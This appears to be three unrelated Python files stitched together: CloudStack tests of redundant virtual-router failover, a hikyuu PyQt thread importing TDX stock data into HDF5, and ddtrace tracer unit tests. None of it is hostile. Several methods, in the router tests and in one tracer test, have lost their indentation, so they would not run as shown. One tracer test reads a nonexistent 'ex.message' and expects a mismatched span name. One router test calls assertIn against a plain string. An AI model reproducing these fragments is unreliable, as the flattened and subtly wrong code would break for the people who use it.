                'UNKNOWN', 'FAULT'], "Redundant state of the master router\
                should be UNKNOWN/FAULT but is %s" %
            routers[0].redundantstate)
        # The former BACKUP must now be the MASTER.
        self.debug(
            "Checking state of the backup router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=backup_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return backup router"
        )
        self.assertEqual(
            routers[0].redundantstate,
            'MASTER',
            "Redundant state of the router should be MASTER but is %s" %
            routers[0].redundantstate)
        self.debug("Starting the old MASTER router")
        try:
            Router.start(self.apiclient, id=master_router.id)
            self.debug("old MASTER router started")
        except Exception as e:
            self.fail("Failed to start master router: %s" % e)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        self.debug(
            "Checking state of the master router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=master_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return backup router"
        )
        # Restarted router must come back as BACKUP, not reclaim MASTER.
        self.assertEqual(
            routers[0].redundantstate,
            'BACKUP',
            "Redundant state of the router should be BACKUP but is %s" %
            routers[0].redundantstate)
        self.assertEqual(
            master_router.publicip,
            routers[0].publicip,
            "Public IP should be same after reboot"
        )
        return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old MASTER
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT MASTER, should have only one BACKUP and one MASTER
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
else:
master_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
# wait for VR update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the master router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=master_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'MASTER',
"Redundant state of the router should be MASTER but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop master router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_03_rebootMasterRvR(self):
        """Reboot the MASTER router and verify the roles swap.

        After rebooting the MASTER, the old MASTER must come back as
        BACKUP, the old BACKUP must take over as MASTER, and the shared
        source-NAT public IP must be unchanged.
        """
        self.debug("Listing routers for network: %s" % self.network.name)
        routers = Router.list(
            self.apiclient,
            networkid=self.network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Classify the pair by their reported redundant state.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.debug("Rebooting the master router")
        try:
            Router.reboot(self.apiclient, id=master_router.id)
        except Exception as e:
            self.fail("Failed to reboot MASTER router: %s" % e)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        # The rebooted router must rejoin as BACKUP.
        self.debug(
            "Checking state of the master router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=master_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            routers[0].redundantstate,
            'BACKUP',
            "Redundant state of the router should be BACKUP but is %s" %
            routers[0].redundantstate)
        # The former BACKUP must now be the MASTER.
        self.debug(
            "Checking state of the backup router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=backup_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            routers[0].redundantstate,
            'MASTER',
            "Redundant state of the router should be MASTER but is %s" %
            routers[0].redundantstate)
        # RVR pairs share the source-NAT public IP, so the new MASTER's
        # public IP must match the old MASTER's.
        self.assertEqual(
            master_router.publicip,
            routers[0].publicip,
            "Public IP should be same after reboot"
        )
        return
    @attr(tags=["advanced", "advancedns", "ssh"])
    def test_04_rebootBackupRvR(self):
        """Reboot the BACKUP router and verify the roles do NOT swap.

        After rebooting the BACKUP, it must come back as BACKUP, the
        MASTER must still be MASTER, and the shared public IP must be
        unchanged.
        """
        self.debug("Listing routers for network: %s" % self.network.name)
        routers = Router.list(
            self.apiclient,
            networkid=self.network.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            len(routers),
            2,
            "Length of the list router should be 2 (Backup & master)"
        )
        # Classify the pair by their reported redundant state.
        if routers[0].redundantstate == 'MASTER':
            master_router = routers[0]
            backup_router = routers[1]
        else:
            master_router = routers[1]
            backup_router = routers[0]
        self.debug("Rebooting the backup router")
        try:
            Router.reboot(self.apiclient, id=backup_router.id)
        except Exception as e:
            self.fail("Failed to reboot BACKUP router: %s" % e)
        # wait for VR to update state
        time.sleep(self.testdata["sleep"])
        # The rebooted router must rejoin as BACKUP (no takeover).
        self.debug(
            "Checking state of the backup router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=backup_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            routers[0].redundantstate,
            'BACKUP',
            "Redundant state of the router should be BACKUP but is %s" %
            routers[0].redundantstate)
        # The MASTER must be unaffected.
        self.debug(
            "Checking state of the master router in %s" %
            self.network.name)
        routers = Router.list(
            self.apiclient,
            id=master_router.id,
            listall=True
        )
        self.assertEqual(
            isinstance(routers, list),
            True,
            "list router should return Master and backup routers"
        )
        self.assertEqual(
            routers[0].redundantstate,
            'MASTER',
            "Redundant state of the router should be MASTER but is %s" %
            routers[0].redundantstate)
        self.assertEqual(
            master_router.publicip,
            routers[0].publicip,
            "Public IP should be same after reboot"
        )
        return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=MASTER. only one router is
# returned with redundantstate = MASTER for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & master)"
)
if routers[0].redundantstate == 'MASTER':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertIn(
routers[0].redundantstate,
'UNKNOWN',
"Redundant state of the backup router\
should be UNKNOWN but is %s" %
routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Master and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
def get_master_and_backupRouter(self):
retry = 4
master_router = backup_router=None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if not (routers[0].redundantstate == 'MASTER' or routers[1].redundantstate == 'MASTER'):
continue;
if routers[0].redundantstate == 'MASTER':
master_router = routers[0]
backup_router = routers[1]
break
else:
master_router = routers[1]
backup_router = routers[0]
break
return master_router, backup_router
    def chek_for_new_backupRouter(self, old_backup_router):
        """Block until the network's BACKUP router is a different router
        than *old_backup_router*, i.e. a replacement VR has been created.

        Polls up to 4 times with a sleep between attempts; fails the
        test on timeout. NOTE(review): the method name is misspelled
        ("chek") but is kept because test_06 calls it by this name.
        """
        master_router, backup_router = self.get_master_and_backupRouter()
        retry = 4
        self.info("Checking if new router is getting created.")
        self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
        # The break happens BEFORE the sleep/refetch, so retry == 0
        # after the loop reliably means no new router was ever observed.
        while old_backup_router.name == backup_router.name:
            self.debug("waiting for new router old router:"+backup_router.name)
            retry = retry-1
            if retry == 0:
                break;
            time.sleep(self.testdata["sleep"])
            master_router, backup_router = self.get_master_and_backupRouter()
        if retry == 0:
            self.fail("New router creation taking too long, timed out")
def wait_untill_router_stabilises(self):
retry=4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
elif retry==0:
self.fail("timedout while waiting for routers to stabilise")
return
time.sleep(self.testdata["sleep"])
    @attr(tags=["bharat"])
    def test_06_updateVRs_in_sequence(self):
        """Update the network offering and check the VRs are replaced in
        sequence: the BACKUP is destroyed/recreated first while the
        MASTER keeps running, then the roles swap and the old MASTER is
        replaced, and finally both routers are Running.
        """
        # Clean-restart the network so it starts from a known-good state.
        self.network.restart(self.apiclient, cleanup=True)
        time.sleep(self.testdata["sleep"])
        self.wait_untill_router_stabilises()
        old_master_router, old_backup_router = self.get_master_and_backupRouter()
        self.info("old_master_router:"+old_master_router.name+" old_backup_router"+old_backup_router.name)
        # Check that the network is in a correct state to start the test.
        self.assertEqual(old_master_router.state, "Running", "The master router is not running, network is not in a correct state to start the test")
        self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
        # Run the (blocking) network update in a child process so this
        # test can observe router states while the update is in flight.
        worker, monitor = multiprocessing.Pipe()
        worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
        worker_process.start()
        # NOTE(review): is_alive() immediately after start() is racy —
        # a fast failure may be missed here; the monitor pipe is only
        # read when the process already exited.
        if not worker_process.is_alive():
            message = monitor.recv()
            if "Complete" not in message:
                self.fail(message)
        self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
        self.chek_for_new_backupRouter(old_backup_router)
        master_router, new_backup_router = self.get_master_and_backupRouter()
        # The MASTER must stay up while the backup is being replaced.
        self.assertEqual(master_router.state, "Running", "State of the master router is not running")
        self.assertEqual(master_router.redundantstate, 'MASTER', "Redundant state of the master router should be MASTER, but it is %s"%master_router.redundantstate)
        self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
        # Wait for the newly created router to take over as MASTER.
        # NOTE(review): the loop refetches into master_router only, so
        # new_backup_router keeps its initial value inside the loop —
        # confirm this matches the intended comparison.
        retry = 4
        while new_backup_router.name != master_router.name:
            retry = retry-1
            if retry == 0:
                break
            time.sleep(self.testdata["sleep"])
            self.info("wating for backup router to become master router name:"+new_backup_router.name)
            master_router, backup_router = self.get_master_and_backupRouter()
        if retry == 0:
            self.fail("timed out while waiting for new backup router to change state to MASTER.")
        # New backup router has become master; the old master is now
        # destroyed and replaced in turn.
        self.info("newly created router:"+new_backup_router.name+" has changed state to Master")
        self.info("old master router:"+old_master_router.name+"is destroyed")
        # Wait until the second replacement router leaves UNKNOWN and
        # settles into the BACKUP role.
        master_router, backup_router = self.get_master_and_backupRouter()
        retry = 4
        while backup_router.redundantstate != 'BACKUP':
            retry = retry-1
            self.info("waiting for router:"+backup_router.name+" to change state to Backup")
            if retry == 0:
                break
            time.sleep(self.testdata["sleep"])
            master_router, backup_router = self.get_master_and_backupRouter()
        self.assertEqual(master_router.state, "Running", "State of the master router is not running")
        self.assertEqual(master_router.redundantstate, 'MASTER', "Redundant state of the master router should be MASTER, but it is %s"%master_router.redundantstate)
        if retry == 0:
            self.fail("timed out while waiting for new backup rotuer to change state to MASTER.")
        # The network update is complete; finally both routers must be Running.
        new_master_router, new_backup_router = self.get_master_and_backupRouter()
        self.assertEqual(new_master_router.state, "Running", "State of the master router:"+new_master_router.name+" is not running")
        self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
        worker_process.join()
|
UseTdxImportToH5Thread.py | # coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2010-2017 fasiondog/hikyuu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sqlite3
from multiprocessing import Queue, Process
from PyQt5.QtCore import QThread, pyqtSignal
from hikyuu.gui.data.ImportTdxToH5Task import ImportTdxToH5Task
from hikyuu.gui.data.ImportWeightToSqliteTask import ImportWeightToSqliteTask
from hikyuu.data.common_sqlite3 import create_database
from hikyuu.data.tdx_to_h5 import tdx_import_stock_name_from_file
from hikyuu.util.mylog import class_logger
class UseTdxImportToH5Thread(QThread):
    """Qt worker thread that imports TDX on-disk quote data into HDF5.

    Builds a list of import tasks from *config* (weights plus DAY/5MIN/
    1MIN K-data for the SH and SZ markets), runs each task in its own
    child process, and forwards progress read from a shared Queue to
    the GUI via the ``message`` pyqtSignal.
    """
    # Signal payload: [msg_name, <task/topic>, ...details].
    message = pyqtSignal(list)

    def __init__(self, parent, config):
        """*parent* is the GUI object owning the shared log queue (may be
        None); *config* is a ConfigParser-like importer configuration.
        """
        super(UseTdxImportToH5Thread, self).__init__()
        self.logger = logging.getLogger(self.__class__.__name__)
        self.parent = parent
        self.log_queue = parent.mp_log_q if parent is not None else None
        self.config = config
        self.msg_name = 'HDF5_IMPORT'
        self.process_list = []
        src_dir = config['tdx']['dir']
        dest_dir = config['hdf5']['dir']
        # Asset categories to import, driven by the config flags.
        self.quotations = []
        if self.config['quotation']['stock']:
            self.quotations.append('stock')
        if self.config['quotation']['fund']:
            self.quotations.append('fund')
        #if self.config['quotation']['future']:
        #    self.quotations.append('future')
        # TDX end-of-day data contains no bond data. Downloading bonds
        # via Pytdx was also rejected: each bond has little data but
        # there are too many kinds, costing space/time for little use.
        #if self.config['quotation']['bond']:
        #    self.quotations.append('bond')
        self.queue = Queue()
        self.tasks = []
        if self.config.getboolean('weight', 'enable', fallback=False):
            self.tasks.append(ImportWeightToSqliteTask(self.log_queue, self.queue, self.config, dest_dir))
        if self.config.getboolean('ktype', 'day', fallback=False):
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', 'DAY', self.quotations, src_dir, dest_dir)
            )
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', 'DAY', self.quotations, src_dir, dest_dir)
            )
        if self.config.getboolean('ktype', 'min5', fallback=False):
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', '5MIN', self.quotations, src_dir, dest_dir)
            )
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', '5MIN', self.quotations, src_dir, dest_dir)
            )
        if self.config.getboolean('ktype', 'min', fallback=False):
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', '1MIN', self.quotations, src_dir, dest_dir)
            )
            self.tasks.append(
                ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', '1MIN', self.quotations, src_dir, dest_dir)
            )

    def __del__(self):
        # Best-effort: kill any worker process that is still running.
        for p in self.process_list:
            if p.is_alive():
                p.terminate()

    def send_message(self, msg):
        """Emit *msg* to the GUI, prefixed with this importer's name."""
        self.message.emit([self.msg_name] + msg)

    def run(self):
        # QThread entry point: report success/failure of the import run.
        try:
            self._run()
        except Exception as e:
            self.send_message(['THREAD', 'FAILURE', str(e)])
        else:
            self.send_message(['THREAD', 'FINISHED'])

    def _run(self):
        src_dir = self.config['tdx']['dir']
        dest_dir = self.config['hdf5']['dir']
        hdf5_import_progress = {'SH': {'DAY': 0, '1MIN': 0, '5MIN': 0}, 'SZ': {'DAY': 0, '1MIN': 0, '5MIN': 0}}
        # Import the stock code tables first (TDX uses Windows-style
        # sub-paths under its installation directory).
        self.send_message(['START_IMPORT_CODE'])
        connect = sqlite3.connect(dest_dir + "/stock.db")
        try:
            create_database(connect)
            tdx_import_stock_name_from_file(connect, src_dir + "\\T0002\\hq_cache\\shm.tnf", 'SH', self.quotations)
            tdx_import_stock_name_from_file(connect, src_dir + "\\T0002\\hq_cache\\szm.tnf", 'SZ', self.quotations)
        finally:
            # BUGFIX: the sqlite connection was previously never closed,
            # leaking the handle (and any pending journal) for the whole
            # life of the thread.
            connect.close()
        self.send_message(['FINISHED_IMPORT_CODE'])
        # Fan out: one child process per import task.
        self.process_list.clear()
        for task in self.tasks:
            p = Process(target=task)
            self.process_list.append(p)
            p.start()
        # Drain progress messages until every task reports completion
        # (a task signals completion by sending progress=None).
        finished_count = len(self.tasks)
        while finished_count > 0:
            message = self.queue.get()
            taskname, market, ktype, progress, total = message
            if progress is None:
                finished_count -= 1
                if taskname == 'IMPORT_KDATA':
                    self.send_message(['IMPORT_KDATA', 'FINISHED', market, ktype, total])
                else:
                    self.send_message([taskname, 'FINISHED'])
                continue
            if taskname == 'IMPORT_WEIGHT':
                if market == 'INFO':
                    self.send_message(['INFO', ktype])
                self.send_message(['IMPORT_WEIGHT', market, total])
            elif taskname == 'IMPORT_KDATA':
                # Overall progress is the average of the SH and SZ legs.
                hdf5_import_progress[market][ktype] = progress
                current_progress = (hdf5_import_progress['SH'][ktype] + hdf5_import_progress['SZ'][ktype]) // 2
                self.send_message(['IMPORT_KDATA', ktype, current_progress])
            else:
                # BUGFIX: typo "Unknow" corrected in the log message.
                self.logger.error("Unknown task: {}".format(taskname))
|
test_tracer.py | # -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import warnings
import mock
import pytest
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.vendor import six
from tests import DummyTracer
from tests import DummyWriter
from tests import TracerTestCase
from tests import override_global_config
from tests.subprocesstest import run_in_subprocess
from .. import override_env
def get_dummy_tracer():
    """Build and return a fresh DummyTracer for test isolation."""
    tracer = DummyTracer()
    return tracer
class TracerTestCases(TracerTestCase):
    def test_tracer_vars(self):
        """Explicit service/resource/span_type are honored; omitted ones
        default to None (resource falls back to the span name)."""
        span = self.trace("a", service="s", resource="r", span_type="t")
        span.assert_matches(name="a", service="s", resource="r", span_type="t")
        # DEV: Finish to ensure we don't leak `service` between spans
        span.finish()
        span = self.trace("a")
        span.assert_matches(name="a", service=None, resource="a", span_type=None)
        span.finish()
    def test_tracer(self):
        """Nested traces produce one root with two children, and a fresh
        trace gets new trace ids."""
        def _mix():
            with self.trace("cake.mix"):
                pass

        def _bake():
            with self.trace("cake.bake"):
                pass

        def _make_cake():
            with self.trace("cake.make") as span:
                # service/resource set on the root are inherited by the
                # child spans created while it is active.
                span.service = "baker"
                span.resource = "cake"
                _mix()
                _bake()

        # let's run it and make sure all is well.
        self.assert_has_no_spans()
        _make_cake()
        # Capture root's trace id to assert later
        root_trace_id = self.get_root_span().trace_id
        # Assert structure of this trace
        self.assert_structure(
            # Root span with 2 children
            dict(name="cake.make", resource="cake", service="baker", parent_id=None),
            (
                # Span with no children
                dict(name="cake.mix", resource="cake.mix", service="baker"),
                # Span with no children
                dict(name="cake.bake", resource="cake.bake", service="baker"),
            ),
        )
        # do it again and make sure it has new trace ids
        self.reset()
        _make_cake()
        self.assert_span_count(3)
        for s in self.spans:
            assert s.trace_id != root_trace_id
    def test_tracer_wrap(self):
        """@tracer.wrap forwards name/service/resource/span_type to the
        span, and the wrapped body can still tag the current span."""
        @self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
        def f(tag_name, tag_value):
            # make sure we can still set tags
            span = self.tracer.current_span()
            span.set_tag(tag_name, tag_value)

        f("a", "b")
        self.assert_span_count(1)
        span = self.get_root_span()
        span.assert_matches(
            name="decorated_function",
            service="s",
            resource="r",
            span_type="t",
            meta=dict(a="b"),
        )
    def test_tracer_pid(self):
        """Only the root span of a trace carries the process-id metric."""
        with self.trace("root") as root_span:
            with self.trace("child") as child_span:
                pass
        # Root span should contain the pid of the current process
        root_span.assert_metrics({system.PID: getpid()}, exact=False)
        # Child span should not contain a pid tag
        child_span.assert_metrics(dict(), exact=True)
    def test_tracer_wrap_default_name(self):
        """Without an explicit name, @wrap uses the function's qualified
        module path as the span name."""
        @self.tracer.wrap()
        def f():
            pass

        f()
        self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
    def test_tracer_wrap_multiple_calls(self):
        """Each call to a wrapped function creates a distinct span."""
        @self.tracer.wrap()
        def f():
            pass

        f()
        f()
        self.assert_span_count(2)
        assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
    """``current_root_span`` should always resolve to the outermost active span,
    regardless of how deeply wrapped/traced calls are nested."""
    @self.tracer.wrap("inner")
    def inner():
        root_span = self.tracer.current_root_span()
        self.assertEqual(root_span.name, "outer")

    @self.tracer.wrap("outer")
    def outer():
        root_span = self.tracer.current_root_span()
        self.assertEqual(root_span.name, "outer")

        with self.trace("mid"):
            root_span = self.tracer.current_root_span()
            self.assertEqual(root_span.name, "outer")

            inner()

    outer()
def test_tracer_wrap_span_nesting(self):
    """Wrapped calls nested inside a manual ``trace`` block must form a
    properly parented three-level trace: outer -> mid -> inner."""
    @self.tracer.wrap("inner")
    def inner():
        pass

    @self.tracer.wrap("outer")
    def outer():
        with self.trace("mid"):
            inner()

    outer()

    self.assert_span_count(3)
    self.assert_structure(
        dict(name="outer"),
        ((dict(name="mid"), (dict(name="inner"),)),),
    )
def test_tracer_wrap_class(self):
    """``tracer.wrap`` must work on static, class and instance methods,
    preserving return values and deriving span names from the functions."""
    class Foo(object):
        @staticmethod
        @self.tracer.wrap()
        def s():
            return 1

        @classmethod
        @self.tracer.wrap()
        def c(cls):
            return 2

        @self.tracer.wrap()
        def i(cls):
            return 3

    f = Foo()
    self.assertEqual(f.s(), 1)
    self.assertEqual(f.c(), 2)
    self.assertEqual(f.i(), 3)

    self.assert_span_count(3)
    self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
    self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
    self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
    """A custom ``wrap_executor`` configured after decoration should replace
    the default tracing wrapper for already-wrapped functions."""
    def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
        with tracer.trace("wrap.overwrite") as span:
            span.set_tag("args", args)
            span.set_tag("kwargs", kwargs)
            return fn(*args, **kwargs)

    @self.tracer.wrap()
    def wrapped_function(param, kw_param=None):
        self.assertEqual(42, param)
        self.assertEqual(42, kw_param)

    # set the custom wrap factory after the wrapper has been called
    self.tracer.configure(wrap_executor=wrap_executor)

    # call the function expecting that the custom tracing wrapper is used
    wrapped_function(42, kw_param=42)

    self.assert_span_count(1)
    self.spans[0].assert_matches(
        name="wrap.overwrite",
        meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
    )
def test_tracer_wrap_factory_nested(self):
    """A custom ``wrap_executor`` span created inside an active trace should
    be parented under it and inherit the parent's service."""
    def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
        with tracer.trace("wrap.overwrite") as span:
            span.set_tag("args", args)
            span.set_tag("kwargs", kwargs)
            return fn(*args, **kwargs)

    @self.tracer.wrap()
    def wrapped_function(param, kw_param=None):
        self.assertEqual(42, param)
        self.assertEqual(42, kw_param)

    # set the custom wrap factory after the wrapper has been called
    self.tracer.configure(wrap_executor=wrap_executor)

    # call the function expecting that the custom tracing wrapper is used
    with self.trace("wrap.parent", service="webserver"):
        wrapped_function(42, kw_param=42)

    self.assert_structure(
        dict(name="wrap.parent", service="webserver"),
        (dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
    )
def test_tracer_disabled(self):
    """Spans are recorded while the tracer is enabled and dropped while it
    is disabled."""
    # Run the identical trace once enabled and once disabled.
    for enabled, check in (
        (True, self.assert_has_spans),
        (False, self.assert_has_no_spans),
    ):
        self.tracer.enabled = enabled
        with self.trace("foo") as span:
            span.set_tag("a", "b")
        check()
        if enabled:
            # Clear recorded spans before the disabled pass.
            self.reset()
def test_unserializable_span_with_finish(self):
    """Regression test: finishing a span holding a non-JSON-serializable
    metric (numpy int64) must not loop forever during serialization."""
    try:
        import numpy as np
    except ImportError:
        raise SkipTest("numpy not installed")

    # a weird case where manually calling finish with an unserializable
    # span was causing an loop of serialization.
    with self.trace("parent") as span:
        span.metrics["as"] = np.int64(1)  # circumvent the data checks
        span.finish()
def test_tracer_disabled_mem_leak(self):
    """Even when disabled, finished spans must be removed from the span
    buffer so a disabled tracer cannot leak memory."""
    # ensure that if the tracer is disabled, we still remove things from the
    # span buffer upon finishing.
    self.tracer.enabled = False
    s1 = self.trace("foo")
    s1.finish()

    p1 = self.tracer.current_span()
